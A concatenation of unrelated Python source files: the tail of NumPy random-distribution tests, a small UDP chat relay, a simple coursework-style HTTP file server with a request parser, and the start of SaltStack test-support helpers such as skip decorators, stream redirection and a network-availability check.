bad_p_two = [1.5]
desired = np.array([0, 0, 1])
random = Generator(MT19937(self.seed))
binom = random.binomial
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
random = Generator(MT19937(self.seed))
actual = random.binomial(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([0, 2, 1], dtype=np.int64)
random = Generator(MT19937(self.seed))
neg_binom = random.negative_binomial
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
random = Generator(MT19937(self.seed))
neg_binom = random.negative_binomial
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
lam = [1]
bad_lam_one = [-1]
desired = np.array([0, 0, 3])
random = Generator(MT19937(self.seed))
max_lam = random._poisson_lam_max
bad_lam_two = [max_lam * 2]
poisson = random.poisson
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
desired = np.array([1, 8, 1])
random = Generator(MT19937(self.seed))
zipf = random.zipf
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, zipf, np.nan)
assert_raises(ValueError, zipf, [0, 0, np.nan])
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([1, 1, 3])
random = Generator(MT19937(self.seed))
geometric = random.geometric
actual = geometric(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geometric, bad_p_one * 3)
assert_raises(ValueError, geometric, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [-1]
bad_nsample_two = [4]
desired = np.array([0, 0, 1])
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, random.hypergeometric, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, random.hypergeometric, ngood * 3, bad_nbad, nsample)
assert_raises(ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_one)
assert_raises(ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_two)
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, random.hypergeometric, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, random.hypergeometric, ngood, bad_nbad * 3, nsample)
assert_raises(ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_one)
assert_raises(ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_two)
random = Generator(MT19937(self.seed))
hypergeom = random.hypergeometric
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
assert_raises(ValueError, hypergeom, -1, 10, 20)
assert_raises(ValueError, hypergeom, 10, -1, 20)
assert_raises(ValueError, hypergeom, 10, 10, -1)
assert_raises(ValueError, hypergeom, 10, 10, 25)
# ValueError for arguments that are too big.
assert_raises(ValueError, hypergeom, 2**30, 10, 20)
assert_raises(ValueError, hypergeom, 999, 2**31, 50)
assert_raises(ValueError, hypergeom, 999, [2**29, 2**30], 1000)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
desired = np.array([1, 1, 1])
random = Generator(MT19937(self.seed))
logseries = random.logseries
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
def test_multinomial(self):
random = Generator(MT19937(self.seed))
actual = random.multinomial([5, 20], [1 / 6.] * 6, size=(3, 2))
desired = np.array([[[0, 0, 2, 1, 2, 0],
[2, 3, 6, 4, 2, 3]],
[[1, 0, 1, 0, 2, 1],
[7, 2, 2, 1, 4, 4]],
[[0, 2, 0, 1, 2, 0],
[3, 2, 3, 3, 4, 5]]], dtype=np.int64)
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = random.multinomial([5, 20], [1 / 6.] * 6)
desired = np.array([[0, 0, 2, 1, 2, 0],
[2, 3, 6, 4, 2, 3]], dtype=np.int64)
assert_array_equal(actual, desired)
class TestThread:
# make sure each state produces the same sequence even in threads
def setup(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(Generator(MT19937(s)), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(Generator(MT19937(s)), o)
# these platforms change x87 fpu precision mode in threads
if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
assert_array_almost_equal(out1, out2)
else:
assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1 / 6.] * 6, size=10000)
self.check_function(gen_random, sz=(10000, 6))
# See Issue #4263
class TestSingleEltArrayInput:
def setup(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (random.exponential, random.standard_gamma,
random.chisquare, random.standard_t,
random.pareto, random.weibull,
random.power, random.rayleigh,
random.poisson, random.zipf,
random.geometric, random.logseries)
probfuncs = (random.geometric, random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
assert_equal(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (random.uniform, random.normal,
random.beta, random.gamma,
random.f, random.noncentral_chisquare,
random.vonmises, random.laplace,
random.gumbel, random.logistic,
random.lognormal, random.wald,
random.binomial, random.negative_binomial)
probfuncs = (random.binomial, random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
out = func(self.argOne, argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
assert_equal(out.shape, self.tgtShape)
def test_integers(self, endpoint):
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
func = random.integers
high = np.array([1])
low = np.array([0])
for dt in itype:
out = func(low, high, endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
out = func(low[0], high, endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
out = func(low, high[0], endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [random.noncentral_f, random.triangular,
random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
assert_equal(out.shape, self.tgtShape)
@pytest.mark.parametrize("config", JUMP_TEST_DATA)
def test_jumped(config):
# Each config contains the initial seed, a number of raw steps
# the sha256 hashes of the initial and the final states' keys and
# the position of of the initial and the final state.
# These were produced using the original C implementation.
seed = config["seed"]
steps = config["steps"]
mt19937 = MT19937(seed)
# Burn step
mt19937.random_raw(steps)
key = mt19937.state["state"]["key"]
if sys.byteorder == 'big':
key = key.byteswap()
sha256 = hashlib.sha256(key)
assert mt19937.state["state"]["pos"] == config["initial"]["pos"]
assert sha256.hexdigest() == config["initial"]["key_sha256"]
jumped = mt19937.jumped()
key = jumped.state["state"]["key"]
if sys.byteorder == 'big':
key = key.byteswap()
sha256 = hashlib.sha256(key)
assert jumped.state["state"]["pos"] == config["jumped"]["pos"]
assert sha256.hexdigest() == config["jumped"]["key_sha256"]
def test_broadcast_size_error():
mu = np.ones(3)
sigma = np.ones((4, 3))
size = (10, 4, 2)
assert random.normal(mu, sigma, size=(5, 4, 3)).shape == (5, 4, 3)
with pytest.raises(ValueError):
random.normal(mu, sigma, size=size)
with pytest.raises(ValueError):
random.normal(mu, sigma, size=(1, 3))
with pytest.raises(ValueError):
random.normal(mu, sigma, size=(4, 1, 1))
# 1 arg
shape = np.ones((4, 3))
with pytest.raises(ValueError):
random.standard_gamma(shape, size=size)
with pytest.raises(ValueError):
random.standard_gamma(shape, size=(3,))
with pytest.raises(ValueError):
random.standard_gamma(shape, size=3)
# Check out
out = np.empty(size)
with pytest.raises(ValueError):
random.standard_gamma(shape, out=out)
# 2 arg
with pytest.raises(ValueError):
random.binomial(1, [0.3, 0.7], size=(2, 1))
with pytest.raises(ValueError):
random.binomial([1, 2], 0.3, size=(2, 1))
with pytest.raises(ValueError):
random.binomial([1, 2], [0.3, 0.7], size=(2, 1))
with pytest.raises(ValueError):
random.multinomial([2, 2], [.3, .7], size=(2, 1))
# 3 arg
a = random.chisquare(5, size=3)
b = random.chisquare(5, size=(4, 3))
c = random.chisquare(5, size=(5, 4, 3))
assert random.noncentral_f(a, b, c).shape == (5, 4, 3)
with pytest.raises(ValueError, match=r"Output size \(6, 5, 1, 1\) is"):
random.noncentral_f(a, b, c, size=(6, 5, 1, 1))
def test_broadcast_size_scalar():
mu = np.ones(3)
sigma = np.ones(3)
random.normal(mu, sigma, size=3)
with pytest.raises(ValueError):
random.normal(mu, sigma, size=2)
|
ServerSide.py | import socket
import threading
def removeTokenandSendMessage(encryptedmsg):
msg = ''
for i in range(0, len(encryptedmsg) - 1):
msg += encryptedmsg[i]
for i in range(0, len(ipA)):
server.sendto(msg.encode('utf8'), (ipA[i], ipB[i]))
def serverSide():
global ipA, ipB
while True:
while True:
try:
msgBytes, clientIP = server.recvfrom(BUFFSIZE)
break
except:
pass
msgAnswer = msgBytes.decode('utf8')
token = msgAnswer[len(msgAnswer) - 1]
if token == '0':
ipA.append(clientIP[0])
ipB.append(clientIP[1])
removeTokenandSendMessage(msgAnswer)
else:
removeTokenandSendMessage(msgAnswer)
if token == '2':
for i in range(0, len(ipA)):
if ipA[i] == clientIP[0] and ipB[i] == clientIP[1]:
del ipA[i]
del ipB[i]
print('Usuário removido com sucesso')
break
print(msgAnswer)
ipA = []
ipB = []
BUFFSIZE = 4096
HOST = ''
PORT = 12000
ADDR = (HOST, PORT)
server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server.bind(ADDR)
print('Aguardando conexões...')
ServerSideThread = threading.Thread(target=serverSide())
ServerSideThread.start()
ServerSideThread.join()
|
httpserver.py | import json
import socket
import threading
import logging
import re
from urllib.parse import urlparse
from pprint import pprint
#from MockHttpRequest import MockHttpRequest
#from MockHttpResponse import MockHttpResponse
from FileManager import FileManager
class MockHttpServer:
BUFFER_SIZE = 1024 # 1 KiB
#HOST = 'localhost'
# initialized port and data directory
def __init__(self, port=8080, d="."):
self.port = port
self.dataDirectory = d
# start the server and dispatch new connection to a thread to handle the communication between client and server
def start(self):
logging.info("Starting web server...")
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
listener.bind(('', self.port))
listener.listen(5)
logging.info('Web server is listening at {}.'.format(self.port))
while True:
(conn, address) = listener.accept()
logging.debug("Received a connection from {0}.".format(address))
threading.Thread(target=self.handler, args=(conn, address, self.dataDirectory)).start()
finally:
logging.info("Shuting down the server...")
listener.close()
logging.info('Web server has been shut down at {}.'.format(self.port))
# handle the request from client and return the response to client
def handler(self, conn, address, dirPath):
try:
# convert bytes to string
data = self.recvall(conn).decode("utf-8")
logging.debug("Received the data: \r\n{0}".format(data))
requestParser = HttpRequestParser(data)
logging.debug("Received the {0} request.".format(requestParser.method))
# pprint(vars(requestParser))
response_msg = self.generateResponse(requestParser, dirPath)
logging.debug('Response message: {0}.'.format(response_msg))
conn.send(response_msg)
#conn.send('HTTP/1.1 200 OK\r\n\r\nsomething'.encode("utf-8"))
conn.close()
except IOError as e:
logging.err(e)
finally:
conn.close()
logging.debug("Disconnected from {0}.".format(address))
# read all content from client
def recvall(self, conn):
data = b''
while True:
part = conn.recv(self.BUFFER_SIZE)
data += part
if len(part) < self.BUFFER_SIZE:
# either 0 or end of data
break
return data
# deal the file request, generate response bytes string, according to HTTP standards.
def generateResponse(self, requestParser, dirPath):
# file app logic
fileapp = FileManager()
if requestParser.method == HttpMethod.Get:
if requestParser.operation == Operation.Download:
status = 200
requestParser.contentType = "text/html"
content = "this is a download file for testig purpose."
elif requestParser.operation == Operation.GetResource:
status = 200
content = "{\"args\": \"" + requestParser.getParameter +"\"}"
elif requestParser.operation == Operation.GetFileList:
fileapp.get_all_files(dirPath, requestParser.contentType)
status = fileapp.status
content = fileapp.content
elif requestParser.operation == Operation.GetFileContent:
fileapp.get_content(dirPath, requestParser.fileName, requestParser.contentType)
status = fileapp.status
content = fileapp.content
elif requestParser.method == HttpMethod.Post:
if requestParser.operation == Operation.PostResource:
logging.debug("Regular post.")
status = 200
content = "{\"args\": {},\"data\": \"" + requestParser.fileContent + "\"}"
else:
fileapp.post_content(dirPath, requestParser.fileName, requestParser.fileContent, requestParser.contentType)
status = fileapp.status
content = fileapp.content
# response
response_msg = 'HTTP/1.1 ' + str(status) + ' ' + self.status_phrase(status) + '\r\n'
response_msg = response_msg + 'Connection: close\r\n' + 'Content-Length: ' + str(len(content)) + '\r\n'
if requestParser.operation == Operation.Download:
response_msg = response_msg + 'Content-Disposition: attachment; filename="download.txt"\r\n'
response_msg = response_msg + 'Content-Type: ' + requestParser.contentType + '\r\n\r\n'
response_msg = response_msg + content
return response_msg.encode("utf-8")
# HTTP status code
def status_phrase(self, status):
phrase = ''
if status == 200:
phrase = 'OK'
if status == 301:
phrase = 'Moved Permanently'
if status == 400:
phrase = 'Bad Request'
if status == 404:
phrase = 'Not Found'
if status == 505:
phrase = 'HTTP Version Not Supported'
return phrase
'''
get 'http://google.ca/'
---------------------------------
GET /? HTTP/1.0
Host:google.ca
get 'http://google.ca/foo'
---------------------------------
GET /foo? HTTP/1.0
Host:google.ca
get -h Content-Type:application/json 'http://google.ca/foo'
'''
'''
post -h Content-Type:application/json -h hk1:hv1 -d '{"": 123abc}' http://httpbin.org/filename
--------------------------------------------------------------------------------------------------
POST /filename HTTP/1.0
Content-Type:application/json
hk1:hv1
Content-Length: 11
Host: httpbin.org
User-Agent: Concordia-HTTP/1.0
Connection: close
{"":123abc}
'''
class HttpRequestParser:
def __init__(self, data):
self.contentType = "application/json"
# self.contentDisposition = "inline"
self.getParameter = ""
(http_header, http_body) = data.split('\r\n\r\n')
lines = http_header.split('\r\n')
(method, resource, version) = lines[0].split(' ')
for line in lines:
if("Content-Type" in line):
self.contentType = line.split(':')[1]
if(resource.endswith("?")):
resource = resource[:-1]
if(method == HttpMethod.Get):
self.method = HttpMethod.Get
if(resource.startswith("/get")):
self.operation = Operation.GetResource
if(resource == "/get"):
self.getParameter = ""
else:
l,r = resource.split('?')
output = {}
for kv in r.split('&'):
k, v = kv.split('=')
output[k] = v
self.getParameter = json.dumps(output)
# TODO /get /get?user=a /get?course=networking&assignment=1
elif(resource == "/download" ):
self.operation = Operation.Download
elif(resource == "/" ):
self.operation = Operation.GetFileList
else:
m = re.match(r"/(.+)", resource)
if(m):
self.operation = Operation.GetFileContent
self.fileName = m.group(1)
else:
self.operation = Operation.Invalid
elif(method == HttpMethod.Post):
self.method = HttpMethod.Post
m = re.match(r"/(.+)", resource)
if(m):
self.fileContent = http_body
if(m.group(1) == "post"):
self.operation = Operation.PostResource
else:
self.operation = Operation.WriteFileContent
self.fileName = m.group(1)
else:
self.operation = Operation.Invalid
else:
self.method = HttpMethod.Invalid
self.version = version
self.contentDisposition = None # TODO
self.overwrite = False # TODO
class HttpMethod:
Invalid = "Invalid"
Get = "GET"
Post = "POST"
class Operation:
Invalid = 0
GetFileList = 1
GetFileContent = 2
WriteFileContent = 3
GetResource = 4
PostResource = 5
Download = 6
|
helpers.py | # -*- coding: utf-8 -*-
'''
:copyright: Copyright 2013-2017 by the SaltStack Team, see AUTHORS for more details.
:license: Apache 2.0, see LICENSE for more details.
tests.support.helpers
~~~~~~~~~~~~~~~~~~~~~
Test support helpers
'''
# pylint: disable=repr-flag-used-in-string,wrong-import-order
# Import Python libs
from __future__ import absolute_import
import base64
import errno
import functools
import inspect
import logging
import os
import random
import signal
import socket
import string
import sys
import threading
import time
import tornado.ioloop
import tornado.web
import types
# Import 3rd-party libs
import psutil # pylint: disable=3rd-party-module-not-gated
import salt.ext.six as six
from salt.ext.six.moves import range, builtins # pylint: disable=import-error,redefined-builtin
try:
from pytestsalt.utils import get_unused_localhost_port # pylint: disable=unused-import
except ImportError:
def get_unused_localhost_port():
'''
Return a random unused port on localhost
'''
usock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
usock.bind(('127.0.0.1', 0))
port = usock.getsockname()[1]
usock.close()
return port
# Import Salt Tests Support libs
from tests.support.unit import skip, _id
from tests.support.mock import patch
from tests.support.paths import FILES
log = logging.getLogger(__name__)
def destructiveTest(caller):
'''
Mark a test case as a destructive test for example adding or removing users
from your system.
.. code-block:: python
class MyTestCase(TestCase):
@destructiveTest
def test_create_user(self):
pass
'''
if inspect.isclass(caller):
# We're decorating a class
old_setup = getattr(caller, 'setUp', None)
def setUp(self, *args, **kwargs):
if os.environ.get('DESTRUCTIVE_TESTS', 'False').lower() == 'false':
self.skipTest('Destructive tests are disabled')
if old_setup is not None:
old_setup(self, *args, **kwargs)
caller.setUp = setUp
return caller
# We're simply decorating functions
@functools.wraps(caller)
def wrap(cls):
if os.environ.get('DESTRUCTIVE_TESTS', 'False').lower() == 'false':
cls.skipTest('Destructive tests are disabled')
return caller(cls)
return wrap
def expensiveTest(caller):
'''
Mark a test case as an expensive test, for example, a test which can cost
money(Salt's cloud provider tests).
.. code-block:: python
class MyTestCase(TestCase):
@expensiveTest
def test_create_user(self):
pass
'''
if inspect.isclass(caller):
# We're decorating a class
old_setup = getattr(caller, 'setUp', None)
def setUp(self, *args, **kwargs):
if os.environ.get('EXPENSIVE_TESTS', 'False').lower() == 'false':
self.skipTest('Expensive tests are disabled')
if old_setup is not None:
old_setup(self, *args, **kwargs)
caller.setUp = setUp
return caller
# We're simply decorating functions
@functools.wraps(caller)
def wrap(cls):
if os.environ.get('EXPENSIVE_TESTS', 'False').lower() == 'false':
cls.skipTest('Expensive tests are disabled')
return caller(cls)
return wrap
def flaky(caller=None, condition=True):
'''
Mark a test as flaky. The test will attempt to run five times,
looking for a successful run. After an immediate second try,
it will use an exponential backoff starting with one second.
.. code-block:: python
class MyTestCase(TestCase):
@flaky
def test_sometimes_works(self):
pass
'''
if caller is None:
return functools.partial(flaky, condition=condition)
if isinstance(condition, bool) and condition is False:
# Don't even decorate
return caller
elif callable(condition):
if condition() is False:
# Don't even decorate
return caller
if inspect.isclass(caller):
attrs = [n for n in dir(caller) if n.startswith('test_')]
for attrname in attrs:
try:
function = getattr(caller, attrname)
if not inspect.isfunction(function) and not inspect.ismethod(function):
continue
setattr(caller, attrname, flaky(caller=function, condition=condition))
except Exception as exc:
log.exception(exc)
continue
return caller
@functools.wraps(caller)
def wrap(cls):
for attempt in range(0, 4):
try:
return caller(cls)
except Exception as exc:
if attempt == 4:
raise exc
backoff_time = attempt ** 2
log.info('Found Exception. Waiting %s seconds to retry.', backoff_time)
time.sleep(backoff_time)
return cls
return wrap
def requires_sshd_server(caller):
'''
Mark a test as requiring the tests SSH daemon running.
.. code-block:: python
class MyTestCase(TestCase):
@requiresSshdServer
def test_create_user(self):
pass
'''
if inspect.isclass(caller):
# We're decorating a class
old_setup = getattr(caller, 'setUp', None)
def setUp(self, *args, **kwargs):
if os.environ.get('SSH_DAEMON_RUNNING', 'False').lower() == 'false':
self.skipTest('SSH tests are disabled')
if old_setup is not None:
old_setup(self, *args, **kwargs)
caller.setUp = setUp
return caller
# We're simply decorating functions
@functools.wraps(caller)
def wrap(cls):
if os.environ.get('SSH_DAEMON_RUNNING', 'False').lower() == 'false':
cls.skipTest('SSH tests are disabled')
return caller(cls)
return wrap
class RedirectStdStreams(object):
'''
Temporarily redirect system output to file like objects.
Default is to redirect to `os.devnull`, which just mutes output, `stdout`
and `stderr`.
'''
def __init__(self, stdout=None, stderr=None):
# Late import
import salt.utils
if stdout is None:
stdout = salt.utils.fopen(os.devnull, 'w') # pylint: disable=resource-leakage
if stderr is None:
stderr = salt.utils.fopen(os.devnull, 'w') # pylint: disable=resource-leakage
self.__stdout = stdout
self.__stderr = stderr
self.__redirected = False
self.patcher = patch.multiple(sys, stderr=self.__stderr, stdout=self.__stdout)
def __enter__(self):
self.redirect()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.unredirect()
def redirect(self):
self.old_stdout = sys.stdout
self.old_stdout.flush()
self.old_stderr = sys.stderr
self.old_stderr.flush()
self.patcher.start()
self.__redirected = True
def unredirect(self):
if not self.__redirected:
return
try:
self.__stdout.flush()
self.__stdout.close()
except ValueError:
# already closed?
pass
try:
self.__stderr.flush()
self.__stderr.close()
except ValueError:
# already closed?
pass
self.patcher.stop()
def flush(self):
if self.__redirected:
try:
self.__stdout.flush()
except Exception:
pass
try:
self.__stderr.flush()
except Exception:
pass
class TestsLoggingHandler(object):
'''
Simple logging handler which can be used to test if certain logging
messages get emitted or not:
.. code-block:: python
with TestsLoggingHandler() as handler:
# (...) Do what ever you wish here
handler.messages # here are the emitted log messages
'''
def __init__(self, level=0, format='%(levelname)s:%(message)s'):
self.level = level
self.format = format
self.activated = False
self.prev_logging_level = None
def activate(self):
class Handler(logging.Handler):
def __init__(self, level):
logging.Handler.__init__(self, level)
self.messages = []
def emit(self, record):
self.messages.append(self.format(record))
self.handler = Handler(self.level)
formatter = logging.Formatter(self.format)
self.handler.setFormatter(formatter)
logging.root.addHandler(self.handler)
self.activated = True
# Make sure we're running with the lowest logging level with our
# tests logging handler
current_logging_level = logging.root.getEffectiveLevel()
if current_logging_level > logging.DEBUG:
self.prev_logging_level = current_logging_level
logging.root.setLevel(0)
def deactivate(self):
if not self.activated:
return
logging.root.removeHandler(self.handler)
# Restore previous logging level if changed
if self.prev_logging_level is not None:
logging.root.setLevel(self.prev_logging_level)
@property
def messages(self):
if not self.activated:
return []
return self.handler.messages
def clear(self):
self.handler.messages = []
def __enter__(self):
self.activate()
return self
def __exit__(self, type, value, traceback):
self.deactivate()
self.activated = False
# Mimic some handler attributes and methods
@property
def lock(self):
if self.activated:
return self.handler.lock
def createLock(self):
if self.activated:
return self.handler.createLock()
def acquire(self):
if self.activated:
return self.handler.acquire()
def release(self):
if self.activated:
return self.handler.release()
def relative_import(import_name, relative_from='../'):
'''
Update sys.path to include `relative_from` before importing `import_name`
'''
try:
return __import__(import_name)
except ImportError:
previous_frame = inspect.getframeinfo(inspect.currentframe().f_back)
sys.path.insert(
0, os.path.realpath(
os.path.join(
os.path.abspath(
os.path.dirname(previous_frame.filename)
),
relative_from
)
)
)
return __import__(import_name)
class ForceImportErrorOn(object):
'''
This class is meant to be used in mock'ed test cases which require an
``ImportError`` to be raised.
>>> import os.path
>>> with ForceImportErrorOn('os.path'):
... import os.path
...
Traceback (most recent call last):
File "<stdin>", line 2, in <module>
File "salttesting/helpers.py", line 263, in __import__
'Forced ImportError raised for {0!r}'.format(name)
ImportError: Forced ImportError raised for 'os.path'
>>>
>>> with ForceImportErrorOn(('os', 'path')):
... import os.path
... sys.modules.pop('os', None)
... from os import path
...
<module 'os' from '/usr/lib/python2.7/os.pyc'>
Traceback (most recent call last):
File "<stdin>", line 4, in <module>
File "salttesting/helpers.py", line 288, in __fake_import__
name, ', '.join(fromlist)
ImportError: Forced ImportError raised for 'from os import path'
>>>
>>> with ForceImportErrorOn(('os', 'path'), 'os.path'):
... import os.path
... sys.modules.pop('os', None)
... from os import path
...
Traceback (most recent call last):
File "<stdin>", line 2, in <module>
File "salttesting/helpers.py", line 281, in __fake_import__
'Forced ImportError raised for {0!r}'.format(name)
ImportError: Forced ImportError raised for 'os.path'
>>>
'''
def __init__(self, *module_names):
self.__module_names = {}
for entry in module_names:
if isinstance(entry, (list, tuple)):
modname = entry[0]
self.__module_names[modname] = set(entry[1:])
else:
self.__module_names[entry] = None
self.patcher = patch.object(builtins, '__import__', self.__fake_import__)
def patch_import_function(self):
self.patcher.start()
def restore_import_funtion(self):
self.patcher.stop()
def __fake_import__(self, name, globals_, locals_, fromlist, level=-1):
if name in self.__module_names:
importerror_fromlist = self.__module_names.get(name)
if importerror_fromlist is None:
raise ImportError(
'Forced ImportError raised for {0!r}'.format(name)
)
if importerror_fromlist.intersection(set(fromlist)):
raise ImportError(
'Forced ImportError raised for {0!r}'.format(
'from {0} import {1}'.format(
name, ', '.join(fromlist)
)
)
)
return self.__original_import(name, globals_, locals_, fromlist, level)
def __enter__(self):
self.patch_import_function()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.restore_import_funtion()
class MockWraps(object):
'''
Helper class to be used with the mock library.
To be used in the ``wraps`` keyword of ``Mock`` or ``MagicMock`` where you
want to trigger a side effect for X times, and afterwards, call the
original and un-mocked method.
As an example:
>>> def original():
... print 'original'
...
>>> def side_effect():
... print 'side effect'
...
>>> mw = MockWraps(original, 2, side_effect)
>>> mw()
side effect
>>> mw()
side effect
>>> mw()
original
>>>
'''
def __init__(self, original, expected_failures, side_effect):
self.__original = original
self.__expected_failures = expected_failures
self.__side_effect = side_effect
self.__call_counter = 0
def __call__(self, *args, **kwargs):
try:
if self.__call_counter < self.__expected_failures:
if isinstance(self.__side_effect, types.FunctionType):
return self.__side_effect()
raise self.__side_effect
return self.__original(*args, **kwargs)
finally:
self.__call_counter += 1
def requires_network(only_local_network=False):
'''
Simple decorator which is supposed to skip a test case in case there's no
network connection to the internet.
'''
def decorator(func):
@functools.wraps(func)
def wrapper(cls):
has_local_network = False
# First lets try if we have a local network. Inspired in
# verify_socket
try:
pubsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
retsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
pubsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
pubsock.bind(('', 18000))
pubsock.close()
retsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
retsock.bind(('', 18001))
retsock.close()
has_local_network = True
except socket.error:
# I wonder if we just have IPV6 support?
try:
pubsock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
retsock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
pubsock.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1
)
pubsock.bind(('', 18000))
pubsock.close()
retsock.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1
)
retsock.bind(('', 18001))
retsock.close()
has_local_network = True
except socket.error:
# Let's continue
pass
if only_local_network is True:
if has_local_network is False:
# Since we're only supposed to check local network, and no
# local network was detected, skip the test
cls.skipTest('No local network was detected')
return func(cls)
# We are using the google.com DNS records as numerical IPs to avoid
# DNS lookups which could greatly slow down this check
for addr in ('173.194.41.198', '173.194.41.199', '173.194.41.200',
'173.194.41.201', '173.194.41.206', '173.194.41.192',
'173.194.41.193', '173.194.41.194', '173.194.41.195',
'173.194.41.196', '173.194.41.197'):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.settimeout(0.25)
sock.connect((addr, 80))
# We connected? Stop the loop
break
except socket.error:
# Let's check the next IP
continue
else:
cls.skipTest('No internet network connection was detected')
finally:
sock.close()
return func(cls)
return wrapper
return decorator
def with_system_user(username, on_existing='delete', delete=True):
'''
Create and optionally destroy a system user to be used within a test
case. The system user is crated using the ``user`` salt module.
The decorated testcase function must accept 'username' as an argument.
:param username: The desired username for the system user.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the user was created.
* delete: delete and re-create the existing user
* skip: skip the test case
'''
if on_existing not in ('nothing', 'delete', 'skip'):
raise RuntimeError(
'The value of \'on_existing\' can only be one of, '
'\'nothing\', \'delete\' and \'skip\''
)
if not isinstance(delete, bool):
raise RuntimeError(
'The value of \'delete\' can only be \'True\' or \'False\''
)
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug('Creating system user {0!r}'.format(username))
create_user = cls.run_function('user.add', [username])
if not create_user:
log.debug('Failed to create system user')
# The user was not created
if on_existing == 'skip':
cls.skipTest(
'Failed to create system user {0!r}'.format(
username
)
